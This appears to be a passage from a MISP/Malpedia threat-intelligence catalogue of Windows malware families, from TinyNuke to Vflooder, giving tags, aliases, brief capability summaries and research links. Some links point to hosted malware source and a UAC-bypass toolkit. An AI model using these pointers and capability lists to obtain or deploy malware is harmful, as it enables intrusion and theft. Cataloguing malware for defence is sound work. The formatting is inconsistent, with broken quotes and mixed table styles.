<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke">https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke</a></td>
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<td><a href="https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/">https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/</a></td>
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<td><a href="https://krebsonsecurity.com/tag/nuclear-bot/">https://krebsonsecurity.com/tag/nuclear-bot/</a></td>
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TinyTyphon

The tag is: `misp-galaxy:malpedia="TinyTyphon"`

TinyTyphon is also known as:

Table 2619. Table References

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<td><a href="https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign">https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign</a></td>
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TinyZbot

The tag is: `misp-galaxy:malpedia="TinyZbot"`

TinyZbot is also known as:

Table 2620. Table References

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<td><a href="https://www.secureworks.com/research/threat-profiles/cobalt-gypsy">https://www.secureworks.com/research/threat-profiles/cobalt-gypsy</a></td>
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Tiop

The tag is: misp-galaxy:malpedia="Tiop"

Tiop is also known as:

Table 2621. Table References

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Tmanger

The tag is: misp-galaxy:malpedia="Tmanger"

Tmanger is also known as:

- LuckyBack

Table 2622. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.tmanger">https://malpedia.caad.fkie.fraunhofer.de/details/win.tmanger</a></td>
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<td><a href="https://www.youtube.com/watch?v=1WfPlgtfWnQ">https://www.youtube.com/watch?v=1WfPlgtfWnQ</a></td>
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<td><a href="https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/">https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/</a></td>
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Tofsee

The tag is: misp-galaxy:malpedia="Tofsee"

Tofsee is also known as:

- Gheg

Table 2623. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee">https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee</a></td>
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</table>
TONEDEAF

TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution.

The tag is: `misp-galaxy:malpedia="TONEDEAF"`

TONEDEAF is also known as:

Table 2624. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf">https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf</a></td>
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<td><a href="https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/">https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/</a></td>
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Tonnerre

The tag is: `misp-galaxy:malpedia="Tonnerre"`

Tonnerre is also known as:

Table 2625. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.tonnerre">https://malpedia.caad.fkie.fraunhofer.de/details/win.tonnerre</a></td>
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<td><a href="https://research.checkpoint.com/2021/after-lightning-comes-thunder/">https://research.checkpoint.com/2021/after-lightning-comes-thunder/</a></td>
</tr>
</tbody>
</table>

Torisma

The tag is: `misp-galaxy:malpedia="Torisma"`

Torisma is also known as:
### TorrentLocker

The tag is: `misp-galaxy:malpedia="TorrentLocker"`

TorrentLocker is also known as:

- Teerac

---

### tRat

tRat is a modular RAT written in Delphi and has appeared in campaigns in September and October of 2018.

The tag is: `misp-galaxy:malpedia="tRat"`

tRat is also known as:

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### TreasureHunter

The tag is: `misp-galaxy:malpedia="TreasureHunter"`
TreasureHunter is also known as:

- huntpos

**Table 2629. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter">https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter</a></td>
</tr>
<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html">https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html</a></td>
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<td><a href="https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/">https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/</a></td>
</tr>
<tr>
<td><a href="http://adelmas.com/blog/treasurehunter.php">http://adelmas.com/blog/treasurehunter.php</a></td>
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</tbody>
</table>

**TrickBot**

A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.


Infection Vector 1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot 2. Phish > Attached MS Office > Macro Enabled > Downloader > Trickbot 3. Phish > Attached MS Office > Macro enabled > Trickbot installed

The tag is: *misp-galaxy:malpedia="TrickBot"

TrickBot is also known as:

- TheTrick
- TrickLoader
- Trickster

**Table 2630. Table References**

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot">https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot</a></td>
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Triton

Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers.

The tag is: misp-galaxy:malpedia="Triton"

Triton is also known as:

- HatMan
- Trisis

Table 2631. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.triton">https://malpedia.caad.fkie.fraunhofer.de/details/win.triton</a></td>
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**Trochilus RAT**

The tag is: `misp-galaxy:malpedia="Trochilus RAT"`

Trochilus RAT is also known as:

*Table 2632. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat</a></td>
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<td><a href="https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlla0gpn">https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlla0gpn</a></td>
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<td><a href="https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains">https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains</a></td>
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<td><a href="https://github.com/m0n0ph1/malware-1/tree/master/Trochilus">https://github.com/m0n0ph1/malware-1/tree/master/Trochilus</a></td>
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**Troldesh**

The tag is: `misp-galaxy:malpedia="Troldesh"`

Troldesh is also known as:

- Shade

*Table 2633. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh">https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh</a></td>
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<td><a href="https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/">https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/</a></td>
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TroubleGrabber

The tag is: `misp-galaxy:malpedia="TroubleGrabber"`

TroubleGrabber is also known as:

Table 2634. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.troublegrabber">https://malpedia.caad.fkie.fraunhofer.de/details/win.troublegrabber</a></td>
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<td><a href="https://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord">https://www.netskope.com/blog/here-comes-troublegrabber-stealing-credentials-through-discord</a></td>
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troystealer

The tag is: `misp-galaxy:malpedia="troystealer"`

troystealer is also known as:

Table 2635. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.troystealer">https://malpedia.caad.fkie.fraunhofer.de/details/win.troystealer</a></td>
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Trump Ransom

The tag is: `misp-galaxy:malpedia="Trump Ransom"`

Trump Ransom is also known as:

Table 2636. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.trump_ransom">https://malpedia.caad.fkie.fraunhofer.de/details/win.trump_ransom</a></td>
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**Tsifiri**

The tag is: `misp-galaxy:malpedia="Tsifiri"`

Tsifiri is also known as:

*Table 2637. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.tsifiri">https://malpedia.caad.fkie.fraunhofer.de/details/win.tsifiri</a></td>
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**TurlaRPC**

The tag is: `misp-galaxy:malpedia="TurlaRPC"`

TurlaRPC is also known as:

*Table 2638. Table References*

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**Turla SilentMoon**

The tag is: `misp-galaxy:malpedia="Turla SilentMoon"`

Turla SilentMoon is also known as:

- GoldenSky
- HyperStack

*Table 2639. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_silentmoon">https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_silentmoon</a></td>
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**TURNEDUP**

The tag is: `misp-galaxy:malpedia="TURNEDUP"`

TURNEDUP is also known as:

- Notestuk

*Table 2640. Table References*

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**TypeHash**

The tag is: `misp-galaxy:malpedia="TypeHash"`

TypeHash is also known as:

- SkinnyD

*Table 2641. Table References*

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**Tyupkin**

The tag is: `misp-galaxy:malpedia="Tyupkin"`

Tyupkin is also known as:

*Table 2642. Table References*

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T-RAT 2.0

The tag is: `misp-galaxy:malpedia="T-RAT 2.0"

T-RAT 2.0 is also known as:

Table 2643. Table References

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</table>

UACMe

A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.

The tag is: `misp-galaxy:malpedia="UACMe"

UACMe is also known as:

- Akagi

Table 2644. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme">https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme</a></td>
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<td><a href="https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/">https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/</a></td>
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<tr>
<td><a href="https://github.com/hfiref0x/UACME">https://github.com/hfiref0x/UACME</a></td>
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UDPoS

The tag is: `misp-galaxy:malpedia="UDPoS"

UDPoS is also known as:

Table 2645. Table References

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<tr>
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UFR Stealer

Information stealer.

The tag is: misp-galaxy:malpedia="UFR Stealer"

UFR Stealer is also known as:

- Usteal

Table 2646. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ufrstealer">https://malpedia.caad.fkie.fraunhofer.de/details/win.ufrstealer</a></td>
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<tr>
<td><a href="https://twitter.com/malwrhunterteam/status/1096363455769202688">https://twitter.com/malwrhunterteam/status/1096363455769202688</a></td>
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  description?Name=TrojanSpy:Win32/Usteal                             |

Uiwix

The tag is: misp-galaxy:malpedia="Uiwix"

Uiwix is also known as:

Table 2647. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.uiwix">https://malpedia.caad.fkie.fraunhofer.de/details/win.uiwix</a></td>
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| https://www.minerva-labs.com/post/ uiwix-evasive-ransomware-exploiting- 
  eternalblue                                                           |

Unidentified 001

The tag is: misp-galaxy:malpedia="Unidentified 001"

Unidentified 001 is also known as:

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Unidentified 003

The tag is: misp-galaxy:malpedia="Unidentified 003"

Unidentified 003 is also known as:

Table 2649. Table References
Unidentified 006

The tag is: `misp-galaxy:malpedia="Unidentified 006"`

Unidentified 006 is also known as:

Table 2650. Table References

Unidentified 013 (Korean)

The tag is: `misp-galaxy:malpedia="Unidentified 013 (Korean)"`

Unidentified 013 (Korean) is also known as:

Table 2651. Table References

Unidentified 020 (Vault7)

The tag is: `misp-galaxy:malpedia="Unidentified 020 (Vault7)"`

Unidentified 020 (Vault7) is also known as:

Table 2652. Table References

Unidentified 022 (Ransom)

The tag is: `misp-galaxy:malpedia="Unidentified 022 (Ransom)"`

Unidentified 022 (Ransom) is also known as:

Table 2653. Table References
Unidentified 023

The tag is: misp-galaxy:malpedia="Unidentified 023"

Unidentified 023 is also known as:

Table 2654. Table References

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Unidentified 024 (Ransomware)

The tag is: misp-galaxy:malpedia="Unidentified 024 (Ransomware)"

Unidentified 024 (Ransomware) is also known as:

Table 2655. Table References

Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_024_ransom
https://twitter.com/malwrhunterteam/status/789161704106127360

Unidentified 025 (Clickfraud)

The tag is: misp-galaxy:malpedia="Unidentified 025 (Clickfraud)"

Unidentified 025 (Clickfraud) is also known as:

Table 2656. Table References

Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_025_clickfraud
http://malware-traffic-analysis.net/2016/05/09/index.html

Unidentified 028

The tag is: misp-galaxy:malpedia="Unidentified 028"

Unidentified 028 is also known as:

Table 2657. Table References

Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_028
Unidentified 029

The tag is: `misp-galaxy:malpedia="Unidentified 029"`

Unidentified 029 is also known as:

Table 2658. Table References

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Filecoder

The tag is: `misp-galaxy:malpedia="Filecoder"`

Filecoder is also known as:

Table 2659. Table References

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<tr>
<td><a href="https://twitter.com/JaromirHorejsi/status/877811773826641920">https://twitter.com/JaromirHorejsi/status/877811773826641920</a></td>
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Unidentified 031

The tag is: `misp-galaxy:malpedia="Unidentified 031"`

Unidentified 031 is also known as:

Table 2660. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031">https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031</a></td>
</tr>
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Unidentified 037

The tag is: `misp-galaxy:malpedia="Unidentified 037"`

Unidentified 037 is also known as:

Table 2661. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037">https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037</a></td>
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</table>

Unidentified 038

The tag is: `misp-galaxy:malpedia="Unidentified 038"`
Unidentified 038 is also known as:

Table 2662. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_038

Unidentified 039

The tag is: misp-galaxy:malpedia="Unidentified 039"

Unidentified 039 is also known as:

Table 2663. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039

Unidentified 041

The tag is: misp-galaxy:malpedia="Unidentified 041"

Unidentified 041 is also known as:

Table 2664. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041

Unidentified 042

The tag is: misp-galaxy:malpedia="Unidentified 042"

Unidentified 042 is also known as:

Table 2665. Table References

Links

https://malperia.caad.fkie.fraunhofer.de/details/win.unidentified_042

http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/

Unidentified 044

The tag is: misp-galaxy:malpedia="Unidentified 044"

Unidentified 044 is also known as:
Unidentified 045

The tag is: misp-galaxy:malpedia="Unidentified 045"

Unidentified 045 is also known as:

Unidentified 047

RAT written in Delphi used by Patchwork APT.

The tag is: misp-galaxy:malpedia="Unidentified 047"

Unidentified 047 is also known as:

Unidentified 052

The tag is: misp-galaxy:malpedia="Unidentified 052"

Unidentified 052 is also known as:

Unidentified 053 (Wonknu?)

The tag is: misp-galaxy:malpedia="Unidentified 053 (Wonknu?)"

Unidentified 053 (Wonknu?) is also known as:
Unidentified 057

Unnamed portscanner as used in the Australian Parliament Hack (Feb 2019).

The tag is: misp-galaxy:malpedia=“Unidentified 057”

Unidentified 057 is also known as:

Table 2671. Table References

Unidentified 058

The tag is: misp-galaxy:malpedia=“Unidentified 058”

Unidentified 058 is also known as:

Table 2672. Table References

win.unidentified_059

The tag is: misp-galaxy:malpedia=“win.unidentified_059”

win.unidentified_059 is also known as:

Table 2673. Table References

Unidentified 060

Unidentified sideloader used by EmissaryPanda

The tag is: misp-galaxy:malpedia=“Unidentified 060”
Unidentified 060 is also known as:

Table 2674. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_060">https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_060</a></td>
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<tr>
<td><a href="https://norfolkinfosec.com/emissary-panda-dll-backdoor/">https://norfolkinfosec.com/emissary-panda-dll-backdoor/</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/">https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/</a></td>
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</table>

**Unidentified 061**

Was previously wrongly tagged as PoweliksDropper, now looking for additional context.

The tag is: *misp-galaxy:malpedia="Unidentified 061"*

Unidentified 061 is also known as:

Table 2675. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_061">https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_061</a></td>
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</table>

**Unidentified 063 (Lazarus Keylogger)**

The tag is: *misp-galaxy:malpedia="Unidentified 063 (Lazarus Keylogger)"*

Unidentified 063 (Lazarus Keylogger) is also known as:

Table 2676. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_063">https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_063</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/KevinPerlow/status/1160766519615381504">https://twitter.com/KevinPerlow/status/1160766519615381504</a></td>
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</tbody>
</table>

**Unidentified 066**

This .net executable can receive commands from c2 sever, upload and download files according to the returned content, perform an uninstall, or modify the registry to achieve persistence across reboots. At the end, it downloads a Python-based RAT, called PeppyRAT.

The tag is: *misp-galaxy:malpedia="Unidentified 066"*

Unidentified 066 is also known as:

Table 2677. Table References

<table>
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Unidentified 067

The tag is: misp-galaxy:malpedia="Unidentified 067"

Unidentified 067 is also known as:

Table 2678. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_067
https://s.tencent.com/research/report/831.html

Unidentified 068

The tag is: misp-galaxy:malpedia="Unidentified 068"

Unidentified 068 is also known as:

Table 2679. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_068

Unidentified 069 (Zeus Unnamed2)

Zeus derivate, no known public references.

The tag is: misp-galaxy:malpedia="Unidentified 069 (Zeus Unnamed2)"

Unidentified 069 (Zeus Unnamed2) is also known as:

Table 2680. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_069
https://zeusmuseum.com/unnamed%202/

Unidentified 070 (Downloader)

Unidentified downloader, possibly related to KONNI.
The tag is: misp-galaxy:malpedia="Unidentified 070 (Downloader)"

Unidentified 070 (Downloader) is also known as:

Table 2681. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_070
- https://twitter.com/M11Sec/status/1217781224204357633

Unidentified 071 (Zeus Unnamed1)

The tag is: misp-galaxy:malpedia="Unidentified 071 (Zeus Unnamed1)"

Unidentified 071 (Zeus Unnamed1) is also known as:

Table 2682. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_071
- https://zeusmuseum.com/unnamed%201/

Unidentified 072 (Metamorfo Loader)

MSI-based loader that has been observed as a stager for win.metamorfo.

The tag is: misp-galaxy:malpedia="Unidentified 072 (Metamorfo Loader)"

Unidentified 072 (Metamorfo Loader) is also known as:

Table 2683. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_072
- https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md

Unidentified 073 (Charming Kitten)

The tag is: misp-galaxy:malpedia="Unidentified 073 (Charming Kitten)"

Unidentified 073 (Charming Kitten) is also known as:

Table 2684. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_073
Unidentified 074 (Downloader)

The tag is: `misp-galaxy:malpedia="Unidentified 074 (Downloader)"

Unidentified 074 (Downloader) is also known as:

Table 2685. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_074">https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_074</a></td>
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</tbody>
</table>

Unidentified 075

Unpacked http_dll.dat from the blog post.

The tag is: `misp-galaxy:malpedia="Unidentified 075"

Unidentified 075 is also known as:

Table 2686. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_075">https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_075</a></td>
</tr>
</tbody>
</table>

Unidentified 076 (Higaisa LNK to Shellcode)

The tag is: `misp-galaxy:malpedia="Unidentified 076 (Higaisa LNK to Shellcode)"

Unidentified 076 (Higaisa LNK to Shellcode) is also known as:

Table 2687. Table References

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html">https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html</a></td>
</tr>
<tr>
<td><a href="https://www.youtube.com/watch?v=8x-pGlWpIYI">https://www.youtube.com/watch?v=8x-pGlWpIYI</a></td>
</tr>
</tbody>
</table>

Unidentified 077 (Lazarus Downloader)

The tag is: `misp-galaxy:malpedia="Unidentified 077 (Lazarus Downloader)"

Unidentified 077 (Lazarus Downloader) is also known as:
**Unidentified 078 (Zebrocy Nim Loader?)**

Suspected Zebrocy loader written in Nim.

The tag is: `misp-galaxy:malpedia="Unidentified 078 (Zebrocy Nim Loader?)"`

Unidentified 078 (Zebrocy Nim Loader?) is also known as:

**Unlock92**

The tag is: `misp-galaxy:malpedia="Unlock92"

Unlock92 is also known as:

**UPAS**

The tag is: `misp-galaxy:malpedia="UPAS"

UPAS is also known as:

- Rombrast
Upatre

Upatre is primarily a downloader. It has been discovered in 2013 and since that time it has been widely updated. Upatre is responsible for delivering further malware to the victims, in specific upatre was a prolific delivery mechanism for Gameover P2P in 2013-2014 and then for Dyre in 2015.

The tag is: misp-galaxy:malpedia="Upatre"

Upatre is also known as:

Table 2692. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre
https://marcoramilli.com/2020/06/24/is-upatre-downloader-coming-back/
https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/
https://secrary.com/ReversingMalware/Upatre/

Urausy

The tag is: misp-galaxy:malpedia="Urausy"

Urausy is also known as:

Table 2693. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy

UrlZone

The tag is: misp-galaxy:malpedia="UrlZone"

UrlZone is also known as:

- Bebloh
- Shiotob

Table 2694. Table References

Links
Uroburos (Windows)

The tag is: *misp-galaxy:malpedia*="Uroburos (Windows)"

Uroburos (Windows) is also known as:

- Snake

Table 2695. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos">https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos</a></td>
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<td><a href="https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken">https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/iron-hunter">https://www.secureworks.com/research/threat-profiles/iron-hunter</a></td>
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<td><a href="https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation">https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation</a></td>
</tr>
<tr>
<td><a href="https://www.circl.lu/pub/tr-25/">https://www.circl.lu/pub/tr-25/</a></td>
</tr>
</tbody>
</table>
USBCulprit

According to Kaspersky, USBCulprit is a malware that is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.

The tag is: *misp-galaxy:malpedia="USBCulprit"*

USBCulprit is also known as:

Table 2696. Table References

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.usbculprit">https://malpedia.caad.fkie.fraunhofer.de/details/win.usbculprit</a></td>
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<tr>
<td><a href="https://securelist.com/cycldek-bridging-the-air-gap/97157/">https://securelist.com/cycldek-bridging-the-air-gap/97157/</a></td>
</tr>
<tr>
<td><a href="https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view">https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view</a></td>
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USBferry

The tag is: *misp-galaxy:malpedia="USBferry"*

USBferry is also known as:

Table 2697. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.usbferry">https://malpedia.caad.fkie.fraunhofer.de/details/win.usbferry</a></td>
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</table>

Vadokrist

ESET reports that Vadokrist is a Latin American banking trojan that they have been tracking since 2018 and that is active almost exclusively in Brazil.

The tag is: *misp-galaxy:malpedia="Vadokrist"*
Vadokrist is also known as:

Table 2698. Table References

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<tr>
<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.vadokrist">https://malpedia.caad.fkie.fraunhofer.de/details/win.vadokrist</a></td>
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<tr>
<td><a href="https://www.welivesecurity.com/2021/01/21/vadokrist-wolf-sheeps-clothing/">https://www.welivesecurity.com/2021/01/21/vadokrist-wolf-sheeps-clothing/</a></td>
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**Vaggen**

The tag is: `misp-galaxy:malpedia="Vaggen"`

Vaggen is also known as:

Table 2699. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.vaggen">https://malpedia.caad.fkie.fraunhofer.de/details/win.vaggen</a></td>
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**VALUEVAULT**

The tag is: `misp-galaxy:malpedia="VALUEVAULT"`

VALUEVAULT is also known as:

Table 2700. Table References

<table>
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</table>

**vanillarat**

Description:

VanillaRat is an advanced remote administration tool coded in C#. VanillaRat uses the Telepathy TCP networking library, dnlib module reading and writing library, and Costura.Fody dll embedding library. Features:
Remote Desktop Viewer (With remote click)
File Browser (Including downloading, drag and drop uploading, and file opening)
Process Manager
Computer Information
Hardware Usage Information (CPU usage, disk usage, available ram)
Message Box Sender
Text To Speech
Screen Locker
Live Keylogger (Also shows current window)
Website Opener
Application Permission Raiser (Normal -> Admin)
Clipboard Text (Copied text)
Chat (Does not allow for client to close form)
Audio Recorder (Microphone)
Process Killer (Task manager, etc.)
Remote Shell
Startup
Security Blacklist (Drag client into list if you don't want connection. Press del. key on client to remove from list)

The tag is: misp-galaxy:malpedia="vanillarat"

vanillarat is also known as:

Table 2701. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.vanillarat
https://github.com/DannyTheSloth/VanillaRAT

Varenyky

In May 2019, ESET researchers observed a spike in ESET telemetry data regarding malware targeting France. After further investigations, they identified malware that distributes various types of spam. One of them is leading to a survey that redirects to a dodgy smartphone promotion while the other is a sextortion campaign. The spam targets the users of Orange S.A., a French ISP.

The tag is: misp-galaxy:malpedia="Varenyky"

Varenyky is also known as:

Table 2702. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.varenyky
Vawtrak

The tag is: `misp-galaxy:malpedia="Vawtrak"`

Vawtrak is also known as:

- Catch
- NeverQuest
- grabnew

Table 2703. Table References

<table>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak">https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak</a></td>
</tr>
<tr>
<td><a href="https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak">https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak</a></td>
</tr>
<tr>
<td><a href="http://thehackernews.com/2017/01/neverquest-fbi-hacker.html">http://thehackernews.com/2017/01/neverquest-fbi-hacker.html</a></td>
</tr>
</tbody>
</table>

VegaLocker

Delphi-based ransomware.

The tag is: `misp-galaxy:malpedia="VegaLocker"`

VegaLocker is also known as:

- Buran
- Vega

Table 2704. Table References

<table>
<thead>
<tr>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.vegalocker">https://malpedia.caad.fkie.fraunhofer.de/details/win.vegalocker</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/malwrhunterteam/status/1095024267459284992">https://twitter.com/malwrhunterteam/status/1095024267459284992</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/malwrhunterteam/status/1093136163836174339">https://twitter.com/malwrhunterteam/status/1093136163836174339</a></td>
</tr>
</tbody>
</table>
## Velso Ransomware

Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension.

The tag is: `misp-galaxy:malpedia="Velso Ransomware"`

Velso Ransomware is also known as:

**Table 2705. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.velso">https://malpedia.caad.fkie.fraunhofer.de/details/win.velso</a></td>
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## Venom RAT

The tag is: `misp-galaxy:malpedia="Venom RAT"`

Venom RAT is also known as:

**Table 2706. Table References**

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.venom">https://malpedia.caad.fkie.fraunhofer.de/details/win.venom</a></td>
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<tr>
<td><a href="https://www.cybeseclabs.com/2020/05/07/venom-remote-administration-tool-from-venom-software/">https://www.cybeseclabs.com/2020/05/07/venom-remote-administration-tool-from-venom-software/</a></td>
</tr>
<tr>
<td><a href="https://blog.malwarelab.pl/posts/venom/">https://blog.malwarelab.pl/posts/venom/</a></td>
</tr>
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## VenomLNK

The tag is: `misp-galaxy:malpedia="VenomLNK"`

VenomLNK is also known as:

**Table 2707. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.venom_lnk">https://malpedia.caad.fkie.fraunhofer.de/details/win.venom_lnk</a></td>
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</table>
**Venus Locker**

The tag is: *misp-galaxy:malpedia=*Venus Locker*"

Venus Locker is also known as:

Table 2708. Table References

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<tr>
<td><a href="https://twitter.com/JaromirHorejsi/status/813690129088937984">https://twitter.com/JaromirHorejsi/status/813690129088937984</a></td>
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**Vermin**

The tag is: *misp-galaxy:malpedia=*Vermin*"

Vermin is also known as:

Table 2709. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin">https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin</a></td>
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</tbody>
</table>

**Vflooder**

